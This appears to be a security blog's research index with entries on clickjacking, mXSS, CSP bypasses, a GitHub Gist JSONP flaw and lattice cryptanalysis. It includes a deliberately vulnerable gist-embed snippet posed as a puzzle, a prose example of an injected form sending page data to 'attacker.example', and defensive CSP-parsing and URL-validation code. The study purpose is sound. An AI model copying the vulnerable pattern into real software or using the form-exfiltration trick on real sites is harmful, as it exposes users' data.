Posts for: #Research

General

About

This is a place to park some well-written research. If I decide to research any of these topics, it will get its own dedicated page.

Web Exploitation Techniques

DoubleClickjacking: A New Era of UI Redressing: This completely revolutionises how we look at clickjacking, from an iframe with a single click to a double-click flow.

Pressing Buttons with Popups (on Twitch, LinkedIn and more): Some very neat tricks (like the DoubleClickjacking technique above) to generate a click on the OAuth dialog boxes of real targets.
[Read more]

mXSS

About

I have not really mastered this concept yet. mXSS is my introduction to reading the HTML specs. I will consider myself to somewhat understand the concept once I find an mXSS bug. This page is mainly to park some important research in mXSS that I find very interesting.

Research

S1r1us mXSS Explained series: Part 1 and Part 2. His GitHub MXSS repository also contains a lot of insights.
mXSS cheatsheet (to save some sanity reading HTML specs).
SecurityMB DOMPurify 2.
[Read more]

CSP Bypass

About

Parking some slick CSP bypasses and techniques to work around CSP. No analysis here for now. Some links may not even be related to bypassing CSP, but they may touch on some part of XSS exploitation that is good to know.

Research

lcamtuf, Post-XSS.
Bypass browser's mitigation against dangling markup injection, form-action trick and other methods: Leaking sensitive data through <form> and a misconfigured CSP policy. Mentions browser defenses against dangling markup injection and how to effectively bypass them.
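The form-action point above is easy to get wrong because `form-action` (like `base-uri` and `frame-ancestors`) never inherits from `default-src`: a policy that only sets `default-src 'self'` still lets an injected `<form action="https://attacker.example">` submit the rest of the page to an attacker-chosen origin. The following is an added example, not code from any of the linked write-ups: a small CSP directive parser that flags the missing directives and shows a weak policy beside a hardened one. The two header strings and the origins are constructed for illustration, and the source matching is deliberately simplified.

```javascript
// Added example (not from the linked research): a small CSP directive parser
// used to show why form-action must be set explicitly.
// The two policies below are constructed for illustration.
const WEAK_CSP = "default-src 'self'; script-src 'self' https://cdn.example";
const HARDENED_CSP = WEAK_CSP + "; form-action 'self'; base-uri 'none'";

// Directives that never fall back to default-src; a policy that omits them
// imposes no restriction at all on that behaviour.
const NO_FALLBACK = ["form-action", "base-uri", "frame-ancestors"];

// Split "name value value; name value" into a Map of name -> [values].
function parseCsp(header) {
  const directives = new Map();
  for (const part of header.split(";")) {
    const [name, ...values] = part.trim().split(/\s+/).filter(Boolean);
    if (!name) continue;
    const key = name.toLowerCase();
    // First occurrence of a directive wins, which is how browsers treat duplicates.
    if (!directives.has(key)) directives.set(key, values);
  }
  return directives;
}

// Which of the non-inheriting directives are absent from the policy?
function missingNoFallbackDirectives(header) {
  const d = parseCsp(header);
  return NO_FALLBACK.filter(name => !d.has(name));
}

// Simplified source matching: '*', 'self' (against selfOrigin) or an exact origin.
// Real CSP matching also handles schemes, wildcard hosts and paths.
function formMayPostTo(header, targetOrigin, selfOrigin) {
  const sources = parseCsp(header).get("form-action");
  if (sources === undefined) return true; // no directive at all: any target is allowed
  return sources.some(src =>
    src === "*" ||
    (src === "'self'" && targetOrigin === selfOrigin) ||
    src === targetOrigin);
}
```

Run `missingNoFallbackDirectives(WEAK_CSP)` against a real header of yours; if `form-action` shows up in the result, the dangling-markup form trick described above is not blocked by that policy, regardless of how tight `default-src` and `script-src` are.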
[Read more]

Github JSONP

Why this research?

I stumbled upon this tweet by ixSly about a vulnerability in a code snippet found in Outline. You can try to figure out the vulnerability here by yourself:

```javascript
/// userUrl is user input
/// CSP: "script-src gist.github.com"
// Parsed into a separate binding; the original's `const userUrl = new URL(userUrl)`
// would throw on the redeclaration, everything else is kept as posted.
const url = new URL(userUrl);
if (url.host === "gist.github.com" && url.protocol === "https:") {
  const gistId = url.pathname.split("/")[2];
  const embedScriptUrl = `https://gist.github.com/${gistId}.js`;
  ctx.body = `
    <html>
      <body>
        <script type="text/javascript" src="${embedScriptUrl}"></script>
      </body>
    </html>
  `;
}
```

Github Gist JSONP endpoint

I thought this was some bypass to "escape" the src quote of the script.
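The snippet checks the host and scheme but then trusts whatever sits in the second path segment of the user-supplied URL, so that segment, not the host check, is what ends up deciding which script the page loads. The following is an added example, not Outline's code or the fix from the tweet: the original construction as a function beside a hardened variant that allow-lists the gist id itself and rejects any other path shape. The id pattern (a decimal number or up to 32 lowercase hex characters) and the expected `/<user>/<gistId>` shape are assumptions made for this example.

```javascript
// Added example, not Outline's code. Assumption: a gist id is a short decimal
// number or a 32-character lowercase hex string, so anything else is rejected.
const GIST_ID = /^[0-9a-f]{1,32}$/;

// The original construction: host and scheme are checked, but the second path
// segment is dropped straight into the script URL without any validation.
function embedUrlOriginal(userUrl) {
  const url = new URL(userUrl);
  if (url.host !== "gist.github.com" || url.protocol !== "https:") return null;
  const gistId = url.pathname.split("/")[2];
  return `https://gist.github.com/${gistId}.js`;
}

// Hardened: same host/scheme check, then a strict allow-list on the id and on
// the overall path shape, so only a bare gist id can ever reach the script URL.
function embedUrlHardened(userUrl) {
  let url;
  try {
    url = new URL(userUrl);
  } catch {
    return null; // unparseable input is not a gist link
  }
  if (url.host !== "gist.github.com" || url.protocol !== "https:") return null;
  const segments = url.pathname.split("/").filter(Boolean); // drop empty pieces
  // Assumed shape: /<user>/<gistId>, i.e. exactly two non-empty segments.
  if (segments.length !== 2) return null;
  const gistId = segments[1];
  if (!GIST_ID.test(gistId)) return null;
  return `https://gist.github.com/${encodeURIComponent(gistId)}.js`;
}
```

Note what the original does with a URL that has only one path segment: `split("/")[2]` is `undefined`, and the template happily turns that into `.../undefined.js`. The hardened version treats a missing or malformed id as "not a gist link" and returns `null`, which is the behaviour you want before handing a string to a `<script src>`.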
[Read more]

Lattice usage in Cryptography

Foreword

I was struggling a lot with lattices in CTF challenges, so I spent some time learning what lattices are and how to use them in solving CTF challenges.

Great resources to get started

A Gentle Tutorial for Lattice-Based Cryptanalysis: highly recommended.
Lightweight Introduction to Lattices.
Coppersmith's Method and Related Applications.
Finding Small Roots of Bivariate Integer Polynomial Equations: a Direct Approach.

The following will be about this paper: Recovering cryptographic keys from partial information, by example, which heavily employs lattices for recovering cryptographic secrets.
[Read more]